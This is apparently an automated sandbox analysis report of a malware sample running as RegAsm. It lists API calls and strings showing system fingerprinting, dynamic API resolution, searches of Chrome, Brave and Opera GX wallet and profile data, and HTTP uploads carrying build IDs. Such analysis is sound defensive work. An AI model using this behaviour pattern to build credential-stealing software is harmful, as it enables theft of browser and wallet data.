95780 41469c 95779->95780 95781 40fa9c 4 API calls 95780->95781 95782 4146b9 95781->95782 95783 40f9e1 lstrcpy 95782->95783 95784 4146c6 95783->95784 95785 40fa9c 4 API calls 95784->95785 95786 4146e3 95785->95786 95787 40f9e1 lstrcpy 95786->95787 95788 4146f0 95787->95788 96440 40fc38 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 95788->96440 95790 414701 95791 40fa9c 4 API calls 95790->95791 95792 41470e 95791->95792 95793 40f9e1 lstrcpy 95792->95793 95794 41471b 95793->95794 95795 40fa9c 4 API calls 95794->95795 95796 414738 95795->95796 95797 40f9e1 lstrcpy 95796->95797 95798 414745 95797->95798 95799 40fa9c 4 API calls 95798->95799 95800 414762 95799->95800 95801 40f9e1 lstrcpy 95800->95801 95802 41476f 95801->95802 96441 410415 memset RegOpenKeyExA 95802->96441 95804 414780 95805 40fa9c 4 API calls 95804->95805 95806 41478d 95805->95806 95807 40f9e1 lstrcpy 95806->95807 95808 41479a 95807->95808 95809 40fa9c 4 API calls 95808->95809 95810 4147b7 95809->95810 95811 40f9e1 lstrcpy 95810->95811 95812 4147c4 95811->95812 95813 40fa9c 4 API calls 95812->95813 95814 4147e1 95813->95814 95815 40f9e1 lstrcpy 95814->95815 95816 4147ee 95815->95816 95817 4104a2 2 API calls 95816->95817 95818 414803 95817->95818 95819 40fa28 3 API calls 95818->95819 95820 414815 95819->95820 95821 40f9e1 lstrcpy 95820->95821 95822 414822 95821->95822 95823 40fa9c 4 API calls 95822->95823 95824 41484b 95823->95824 95825 40f9e1 lstrcpy 95824->95825 95826 414858 95825->95826 95827 40fa9c 4 API calls 95826->95827 95828 414875 95827->95828 95829 40f9e1 lstrcpy 95828->95829 95830 414882 95829->95830 95831 4104dd 13 API calls 95830->95831 95832 414897 95831->95832 95833 40fa28 3 API calls 95832->95833 95834 4148a9 95833->95834 95835 40f9e1 lstrcpy 95834->95835 95836 4148b6 95835->95836 95837 40fa9c 4 API calls 95836->95837 95838 4148df 95837->95838 95839 40f9e1 lstrcpy 95838->95839 95840 4148ec 95839->95840 95841 40fa9c 4 API calls 95840->95841 95842 414909 95841->95842 95843 40f9e1 lstrcpy 
95842->95843 95844 414916 95843->95844 95845 414922 GetCurrentProcessId 95844->95845 96445 411001 OpenProcess 95845->96445 95848 40fa28 3 API calls 95849 414945 95848->95849 95850 40f9e1 lstrcpy 95849->95850 95851 414952 95850->95851 95852 40fa9c 4 API calls 95851->95852 95853 41497b 95852->95853 95854 40f9e1 lstrcpy 95853->95854 95855 414988 95854->95855 95856 40fa9c 4 API calls 95855->95856 95857 4149a5 95856->95857 95858 40f9e1 lstrcpy 95857->95858 95859 4149b2 95858->95859 95860 40fa9c 4 API calls 95859->95860 95861 4149cf 95860->95861 95862 40f9e1 lstrcpy 95861->95862 95863 4149dc 95862->95863 95864 40fa9c 4 API calls 95863->95864 95865 4149f9 95864->95865 95866 40f9e1 lstrcpy 95865->95866 95867 414a06 95866->95867 96450 41064b GetProcessHeap HeapAlloc 95867->96450 95870 40fa9c 4 API calls 95871 414a24 95870->95871 95872 40f9e1 lstrcpy 95871->95872 95873 414a31 95872->95873 95874 40fa9c 4 API calls 95873->95874 95875 414a4e 95874->95875 95876 40f9e1 lstrcpy 95875->95876 95877 414a5b 95876->95877 95878 40fa9c 4 API calls 95877->95878 95879 414a78 95878->95879 95880 40f9e1 lstrcpy 95879->95880 95881 414a85 95880->95881 96456 41077c _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 95881->96456 95884 40fa28 3 API calls 95885 414aac 95884->95885 95886 40f9e1 lstrcpy 95885->95886 95887 414ab9 95886->95887 95888 40fa9c 4 API calls 95887->95888 95889 414ae2 95888->95889 95890 40f9e1 lstrcpy 95889->95890 95891 414aef 95890->95891 95892 40fa9c 4 API calls 95891->95892 95893 414b0c 95892->95893 95894 40f9e1 lstrcpy 95893->95894 95895 414b19 95894->95895 96469 410925 _EH_prolog CoInitializeEx CoInitializeSecurity CoCreateInstance 95895->96469 95898 40fa28 3 API calls 95899 414b40 95898->95899 95900 40f9e1 lstrcpy 95899->95900 95901 414b4d 95900->95901 95902 40fa9c 4 API calls 95901->95902 95903 414b76 95902->95903 95904 40f9e1 lstrcpy 95903->95904 95905 414b83 95904->95905 95906 40fa9c 4 API calls 95905->95906 95907 414ba0 95906->95907 95908 40f9e1 lstrcpy 
95907->95908 95909 414bad 95908->95909 96482 40fbfd GetProcessHeap HeapAlloc GetComputerNameA 95909->96482 95912 40fa9c 4 API calls 95913 414bcb 95912->95913 95914 40f9e1 lstrcpy 95913->95914 95915 414bd8 95914->95915 95916 40fa9c 4 API calls 95915->95916 95917 414bf5 95916->95917 95918 40f9e1 lstrcpy 95917->95918 95919 414c02 95918->95919 95920 40fa9c 4 API calls 95919->95920 95921 414c1f 95920->95921 95922 40f9e1 lstrcpy 95921->95922 95923 414c2c 95922->95923 96484 40fbcb GetProcessHeap HeapAlloc GetUserNameA 95923->96484 95925 414c3d 95926 40fa9c 4 API calls 95925->95926 95927 414c4a 95926->95927 95928 40f9e1 lstrcpy 95927->95928 95929 414c57 95928->95929 95930 40fa9c 4 API calls 95929->95930 95931 414c74 95930->95931 95932 40f9e1 lstrcpy 95931->95932 95933 414c81 95932->95933 95934 40fa9c 4 API calls 95933->95934 95935 414c9e 95934->95935 95936 40f9e1 lstrcpy 95935->95936 95937 414cab 95936->95937 96485 4103a0 7 API calls 95937->96485 95940 40fa28 3 API calls 95941 414cd2 95940->95941 95942 40f9e1 lstrcpy 95941->95942 95943 414cdf 95942->95943 95944 40fa9c 4 API calls 95943->95944 95945 414d08 95944->95945 95946 40f9e1 lstrcpy 95945->95946 95947 414d15 95946->95947 95948 40fa9c 4 API calls 95947->95948 95949 414d32 95948->95949 95950 40f9e1 lstrcpy 95949->95950 95951 414d3f 95950->95951 96488 40fce5 _EH_prolog 95951->96488 95954 40fa28 3 API calls 95955 414d69 95954->95955 95956 40f9e1 lstrcpy 95955->95956 95957 414d76 95956->95957 95958 40fa9c 4 API calls 95957->95958 95959 414da5 95958->95959 95960 40f9e1 lstrcpy 95959->95960 95961 414db2 95960->95961 95962 40fa9c 4 API calls 95961->95962 95963 414dd5 95962->95963 95964 40f9e1 lstrcpy 95963->95964 95965 414de2 95964->95965 96498 40fc38 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 95965->96498 95967 414df6 95968 40fa9c 4 API calls 95967->95968 95969 414e06 95968->95969 95970 40f9e1 lstrcpy 95969->95970 95971 414e13 95970->95971 95972 40fa9c 4 API calls 95971->95972 95973 414e36 95972->95973 95974 40f9e1 

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(74DD0000,00416AAC), ref: 00417659
                                                                                    • GetProcAddress.KERNEL32 ref: 00417670
                                                                                    • GetProcAddress.KERNEL32 ref: 00417687
                                                                                    • GetProcAddress.KERNEL32 ref: 0041769E
                                                                                    • GetProcAddress.KERNEL32 ref: 004176B5
                                                                                    • GetProcAddress.KERNEL32 ref: 004176CC
                                                                                    • GetProcAddress.KERNEL32 ref: 004176E3
                                                                                    • GetProcAddress.KERNEL32 ref: 004176FA
                                                                                    • GetProcAddress.KERNEL32 ref: 00417711
                                                                                    • GetProcAddress.KERNEL32 ref: 00417728
                                                                                    • GetProcAddress.KERNEL32 ref: 0041773F
                                                                                    • GetProcAddress.KERNEL32 ref: 00417756
                                                                                    • GetProcAddress.KERNEL32 ref: 0041776D
                                                                                    • GetProcAddress.KERNEL32 ref: 00417784
                                                                                    • GetProcAddress.KERNEL32 ref: 0041779B
                                                                                    • GetProcAddress.KERNEL32 ref: 004177B2
                                                                                    • GetProcAddress.KERNEL32 ref: 004177C9
                                                                                    • GetProcAddress.KERNEL32 ref: 004177E0
                                                                                    • GetProcAddress.KERNEL32 ref: 004177F7
                                                                                    • GetProcAddress.KERNEL32 ref: 0041780E
                                                                                    • GetProcAddress.KERNEL32 ref: 00417825
                                                                                    • GetProcAddress.KERNEL32 ref: 0041783C
                                                                                    • GetProcAddress.KERNEL32 ref: 00417853
                                                                                    • GetProcAddress.KERNEL32 ref: 0041786A
                                                                                    • GetProcAddress.KERNEL32 ref: 00417881
                                                                                    • GetProcAddress.KERNEL32 ref: 00417898
                                                                                    • GetProcAddress.KERNEL32 ref: 004178AF
                                                                                    • GetProcAddress.KERNEL32 ref: 004178C6
                                                                                    • GetProcAddress.KERNEL32 ref: 004178DD
                                                                                    • GetProcAddress.KERNEL32 ref: 004178F4
                                                                                    • GetProcAddress.KERNEL32 ref: 0041790B
                                                                                    • GetProcAddress.KERNEL32 ref: 00417922
                                                                                    • GetProcAddress.KERNEL32 ref: 00417939
                                                                                    • GetProcAddress.KERNEL32 ref: 00417950
                                                                                    • GetProcAddress.KERNEL32 ref: 00417967
                                                                                    • GetProcAddress.KERNEL32 ref: 0041797E
                                                                                    • GetProcAddress.KERNEL32 ref: 00417995
                                                                                    • GetProcAddress.KERNEL32 ref: 004179AC
                                                                                    • GetProcAddress.KERNEL32 ref: 004179C3
                                                                                    • GetProcAddress.KERNEL32 ref: 004179DA
                                                                                    • GetProcAddress.KERNEL32 ref: 004179F1
                                                                                    • GetProcAddress.KERNEL32 ref: 00417A08
                                                                                    • GetProcAddress.KERNEL32 ref: 00417A1F
                                                                                    • LoadLibraryA.KERNEL32(00416AAC,?,00000040,00000064,0041366A,00412D12,?,0000002C,00000064,004135E9,00413626,?,00000024,00000064,Function_000135AC,00413295), ref: 00417A30
                                                                                    • LoadLibraryA.KERNEL32 ref: 00417A41
                                                                                    • LoadLibraryA.KERNEL32 ref: 00417A52
                                                                                    • LoadLibraryA.KERNEL32 ref: 00417A63
                                                                                    • LoadLibraryA.KERNEL32 ref: 00417A74
                                                                                    • LoadLibraryA.KERNEL32 ref: 00417A85
                                                                                    • LoadLibraryA.KERNEL32 ref: 00417A96
                                                                                    • LoadLibraryA.KERNEL32 ref: 00417AA7
                                                                                    • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00417AB7
                                                                                    • GetProcAddress.KERNEL32(75290000), ref: 00417AD2
                                                                                    • GetProcAddress.KERNEL32 ref: 00417AE9
                                                                                    • GetProcAddress.KERNEL32 ref: 00417B00
                                                                                    • GetProcAddress.KERNEL32 ref: 00417B17
                                                                                    • GetProcAddress.KERNEL32 ref: 00417B2E
                                                                                    • GetProcAddress.KERNEL32(73B50000), ref: 00417B4D
                                                                                    • GetProcAddress.KERNEL32 ref: 00417B64
                                                                                    • GetProcAddress.KERNEL32 ref: 00417B7B
                                                                                    • GetProcAddress.KERNEL32 ref: 00417B92
                                                                                    • GetProcAddress.KERNEL32 ref: 00417BA9
                                                                                    • GetProcAddress.KERNEL32 ref: 00417BC0
                                                                                    • GetProcAddress.KERNEL32 ref: 00417BD7
                                                                                    • GetProcAddress.KERNEL32 ref: 00417BEE
                                                                                    • GetProcAddress.KERNEL32(752C0000), ref: 00417C09
                                                                                    • GetProcAddress.KERNEL32 ref: 00417C20
                                                                                    • GetProcAddress.KERNEL32 ref: 00417C37
                                                                                    • GetProcAddress.KERNEL32 ref: 00417C4E
                                                                                    • GetProcAddress.KERNEL32 ref: 00417C65
                                                                                    • GetProcAddress.KERNEL32(74EC0000), ref: 00417C84
                                                                                    • GetProcAddress.KERNEL32 ref: 00417C9B
                                                                                    • GetProcAddress.KERNEL32 ref: 00417CB2
                                                                                    • GetProcAddress.KERNEL32 ref: 00417CC9
                                                                                    • GetProcAddress.KERNEL32 ref: 00417CE0
                                                                                    • GetProcAddress.KERNEL32 ref: 00417CF7
                                                                                    • GetProcAddress.KERNEL32(75BD0000), ref: 00417D16
                                                                                    • GetProcAddress.KERNEL32 ref: 00417D2D
                                                                                    • GetProcAddress.KERNEL32 ref: 00417D44
                                                                                    • GetProcAddress.KERNEL32 ref: 00417D5B
                                                                                    • GetProcAddress.KERNEL32 ref: 00417D72
                                                                                    • GetProcAddress.KERNEL32 ref: 00417D89
                                                                                    • GetProcAddress.KERNEL32 ref: 00417DA0
                                                                                    • GetProcAddress.KERNEL32 ref: 00417DB7
                                                                                    • GetProcAddress.KERNEL32 ref: 00417DCE
                                                                                    • GetProcAddress.KERNEL32(75A70000), ref: 00417DE9
                                                                                    • GetProcAddress.KERNEL32 ref: 00417E00
                                                                                    • GetProcAddress.KERNEL32 ref: 00417E17
                                                                                    • GetProcAddress.KERNEL32 ref: 00417E2E
                                                                                    • GetProcAddress.KERNEL32 ref: 00417E45
                                                                                    • GetProcAddress.KERNEL32(75450000), ref: 00417E60
                                                                                    • GetProcAddress.KERNEL32 ref: 00417E77
                                                                                    • GetProcAddress.KERNEL32(75DA0000), ref: 00417E92
                                                                                    • GetProcAddress.KERNEL32 ref: 00417EA9
                                                                                    • GetProcAddress.KERNEL32(6F090000), ref: 00417EC8
                                                                                    • GetProcAddress.KERNEL32 ref: 00417EDF
                                                                                    • GetProcAddress.KERNEL32 ref: 00417EF6
                                                                                    • GetProcAddress.KERNEL32 ref: 00417F0D
                                                                                    • GetProcAddress.KERNEL32 ref: 00417F24
                                                                                    • GetProcAddress.KERNEL32 ref: 00417F3B
                                                                                    • GetProcAddress.KERNEL32 ref: 00417F52
                                                                                    • GetProcAddress.KERNEL32 ref: 00417F69
                                                                                    • GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00417F7F
                                                                                    • GetProcAddress.KERNEL32(InternetSetOptionA), ref: 00417F95
                                                                                    • GetProcAddress.KERNEL32(75AF0000), ref: 00417FB0
                                                                                    • GetProcAddress.KERNEL32 ref: 00417FC7
                                                                                    • GetProcAddress.KERNEL32 ref: 00417FDE
                                                                                    • GetProcAddress.KERNEL32 ref: 00417FF5
                                                                                    • GetProcAddress.KERNEL32(75D90000), ref: 00418010
                                                                                    • GetProcAddress.KERNEL32(6CC10000), ref: 0041802B
                                                                                    • GetProcAddress.KERNEL32 ref: 00418042
                                                                                    • GetProcAddress.KERNEL32 ref: 00418059
                                                                                    • GetProcAddress.KERNEL32 ref: 00418070
                                                                                    • GetProcAddress.KERNEL32(6CA20000,SymMatchString), ref: 0041808A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                    • String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
                                                                                    • API String ID: 2238633743-951535364
                                                                                    • Opcode ID: 03224874fb45e6c46fb278b45bf30394fb78a2bdfedb5a718972308c7089d793
                                                                                    • Instruction ID: b1e844fb62b820e65f219bf097f7cac9561447c547020423e5517cd844e2ca6b
                                                                                    • Opcode Fuzzy Hash: 03224874fb45e6c46fb278b45bf30394fb78a2bdfedb5a718972308c7089d793
                                                                                    • Instruction Fuzzy Hash: 3D42D97E811620EFEB929FA0FD48A653BB3F70AB01B147439FA0586231D7364865EF54

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00405151
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                      • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                      • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004051FC
                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040539B
                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 004053D2
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,00000000,?,00425B20,00000000), ref: 004057CC
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004057DD
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004057E7
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 004057EE
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004057FF
                                                                                    • memcpy.MSVCRT ref: 00405810
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00405821
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 0040583A
                                                                                    • memcpy.MSVCRT ref: 00405843
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405856
                                                                                    • HttpSendRequestA.WININET(?,00000000,00000000), ref: 0040586A
                                                                                    • InternetReadFile.WININET(?,?,000000C7,?), ref: 004058BE
                                                                                    • InternetCloseHandle.WININET(?), ref: 004058C9
                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004053F7
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    • InternetCloseHandle.WININET(?), ref: 004058D2
                                                                                    • InternetCloseHandle.WININET(?), ref: 004058DB
                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00405213
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internetlstrlen$lstrcpy$H_prolog$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
                                                                                    • String ID: "$"$"$($------$------$------$------$build_id$mode
                                                                                    • API String ID: 2237346945-1447386369
                                                                                    • Opcode ID: c89f37200f9922f7106968f5488809e0814500ea6250647198128ec8ff4c3949
                                                                                    • Instruction ID: b4e14776caadebfe53afa945c4bf6ce093965098b883e79db6b3ac6117d29439
                                                                                    • Opcode Fuzzy Hash: c89f37200f9922f7106968f5488809e0814500ea6250647198128ec8ff4c3949
                                                                                    • Instruction Fuzzy Hash: 6D425EB190414DEADB11EBE1C956BEEBBB8AF18308F50017EE505B3582DB781B4CCB65

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040C67E
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00425BD3,00425BD2,00000000,?,00425D1C,?,?,00425BCF,?,?,00000000), ref: 0040C71F
                                                                                    • StrCmpCA.SHLWAPI(?,00425D20,?,?,00000000), ref: 0040C786
                                                                                    • StrCmpCA.SHLWAPI(?,00425D24,?,?,00000000), ref: 0040C7A0
                                                                                    • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00425D28,?,?,00425BD6,?,?,00000000), ref: 0040C851
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                    • String ID: Brave$Google Chrome$H$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                    • API String ID: 3869166975-1816240570
                                                                                    • Opcode ID: 6ef869c5acf4193e10be2cf9d0355ff0e5442593db8ce554f40d3e93bb02fcfc
                                                                                    • Instruction ID: 7e6182c7e919ebae31536edbd22d10e843a74c74831f1e41d64d485d49d03601
                                                                                    • Opcode Fuzzy Hash: 6ef869c5acf4193e10be2cf9d0355ff0e5442593db8ce554f40d3e93bb02fcfc
                                                                                    • Instruction Fuzzy Hash: 3A826070900288EADF25EBA5C955BDDBBB4AF19304F5040BEE449B32C2DB78174DCB66

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004153FB
                                                                                    • wsprintfA.USER32 ref: 00415421
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00415438
                                                                                    • memset.MSVCRT ref: 0041544F
                                                                                    • memset.MSVCRT ref: 0041545D
                                                                                    • StrCmpCA.SHLWAPI(?,0042684C), ref: 0041547B
                                                                                    • StrCmpCA.SHLWAPI(?,00426850), ref: 00415495
                                                                                    • wsprintfA.USER32 ref: 004154B9
                                                                                    • StrCmpCA.SHLWAPI(?,0042656E), ref: 004154CA
                                                                                    • wsprintfA.USER32 ref: 004154F0
                                                                                    • wsprintfA.USER32 ref: 00415504
                                                                                    • memset.MSVCRT ref: 00415516
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00415528
                                                                                    • strtok_s.MSVCRT ref: 00415561
                                                                                    • memset.MSVCRT ref: 00415576
                                                                                    • lstrcat.KERNEL32(?,?), ref: 0041558B
                                                                                    • PathMatchSpecA.SHLWAPI(?,00000000), ref: 004155AE
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004156B0
                                                                                    • strtok_s.MSVCRT ref: 004156E1
                                                                                    • FindNextFileA.KERNELBASE(000000FF,?), ref: 00415804
                                                                                    • FindClose.KERNEL32(000000FF), ref: 00415815
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcatlstrcpymemsetwsprintf$Find$Filestrtok_s$CloseFirstMatchNextPathSpecSystemTimeUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                    • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                    • API String ID: 264515753-332874205
                                                                                    • Opcode ID: 6f8998cb08b0944052efbf8740fd338e57bd105e93cc6d3c4222f09e779521f7
                                                                                    • Instruction ID: 697dee4ec641feb1abd42be2dd66715ab0a5b9e69653565ecd0b7dc1d93a1252
                                                                                    • Opcode Fuzzy Hash: 6f8998cb08b0944052efbf8740fd338e57bd105e93cc6d3c4222f09e779521f7
                                                                                    • Instruction Fuzzy Hash: A4C170B1D0015DEEDF21EBE4DC45FDEBBBDAB08304F50406AF519A2191DB389A48CB65

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C74F688,00001000), ref: 6C6C35D5
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6C35E0
                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 6C6C35FD
                                                                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C6C363F
                                                                                    • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C6C369F
                                                                                    • __aulldiv.LIBCMT ref: 6C6C36E4
                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6C6C3773
                                                                                    • EnterCriticalSection.KERNEL32(6C74F688), ref: 6C6C377E
                                                                                    • LeaveCriticalSection.KERNEL32(6C74F688), ref: 6C6C37BD
                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6C6C37C4
                                                                                    • EnterCriticalSection.KERNEL32(6C74F688), ref: 6C6C37CB
                                                                                    • LeaveCriticalSection.KERNEL32(6C74F688), ref: 6C6C3801
                                                                                    • __aulldiv.LIBCMT ref: 6C6C3883
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C6C3902
                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C6C3918
                                                                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C6C394C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                    • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                    • API String ID: 301339242-3790311718
